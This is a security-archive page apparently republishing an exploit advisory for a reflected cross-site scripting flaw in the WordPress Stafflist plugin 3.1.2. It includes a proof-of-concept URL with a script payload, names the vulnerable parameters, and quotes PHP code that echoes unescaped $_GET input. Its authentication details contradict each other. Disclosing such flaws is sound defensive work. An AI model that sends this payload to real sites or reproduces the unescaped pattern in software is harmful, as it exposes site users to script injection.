Headline
WordPress Stafflist 3.1.2 Cross Site Scripting
WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.
WordPress Stafflist 3.1.2 Cross Site Scripting
Posted May 3, 2022
Authored by Hassan Khan Yusufzai
WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.
tags | exploit, xss
SHA-256 | 74269ba0f910606e9499b4b87b6ba8ea243f907c7743fde42c4af10707d6f9da
Download | Favorite | View
WordPress Stafflist 3.1.2 Cross Site Scripting
# Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A cross site scripting reflected vulnerability has been identified inWordPress Plugin stafflist version less then 3.1.2. that allowsunauthenticated users to run arbitrary javascript code insideWordPress using Stafflist Plugin.# POChttp://localhost:10003/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E# Vulnerable Parametersp and s parameters are vulnerable.# Vulnerable Code:$html = ($cur > 1 ? "<p class='pager'><ahref='{$stafflisturl}&p=".($cur-1)."&s={$_GET['s']}'>Previous</a></p>" : ""); //<
File Tags
- ActiveX (932)
- Advisory (77,240)
- Arbitrary (15,057)
- BBS (2,859)
- Bypass (1,550)
- CGI (1,010)
- Code Execution (6,627)
- Conference (668)
- Cracker (797)
- CSRF (3,268)
- DoS (21,736)
- Encryption (2,330)
- Exploit (49,655)
- File Inclusion (4,142)
- File Upload (938)
- Firewall (821)
- Info Disclosure (2,542)
- Intrusion Detection (850)
- Java (2,780)
- JavaScript (792)
- Kernel (5,997)
- Local (13,976)
- Magazine (586)
- Overflow (12,125)
- Perl (1,410)
- PHP (5,038)
- Proof of Concept (2,276)
- Protocol (3,290)
- Python (1,389)
- Remote (29,590)
- Root (3,441)
- Ruby (574)
- Scanner (1,629)
- Security Tool (7,672)
- Shell (3,054)
- Shellcode (1,201)
- Sniffer (879)
- Spoof (2,077)
- SQL Injection (15,975)
- TCP (2,350)
- Trojan (672)
- UDP (866)
- Virus (658)
- Vulnerability (30,362)
- Web (8,972)
- Whitepaper (3,710)
- x86 (942)
- XSS (17,290)
- Other
File Archives
- May 2022
- April 2022
- March 2022
- February 2022
- January 2022
- December 2021
- November 2021
- October 2021
- September 2021
- August 2021
- July 2021
- June 2021
- Older
Systems
- AIX (425)
- Apple (1,875)
- BSD (368)
- CentOS (55)
- Cisco (1,911)
- Debian (5,948)
- Fedora (1,690)
- FreeBSD (1,241)
- Gentoo (4,152)
- HPUX (877)
- iOS (317)
- iPhone (108)
- IRIX (220)
- Juniper (67)
- Linux (41,937)
- Mac OS X (683)
- Mandriva (3,105)
- NetBSD (255)
- OpenBSD (478)
- RedHat (11,372)
- Slackware (941)
- Solaris (1,606)
- SUSE (1,444)
- Ubuntu (7,747)
- UNIX (9,051)
- UnixWare (184)
- Windows (6,373)
- Other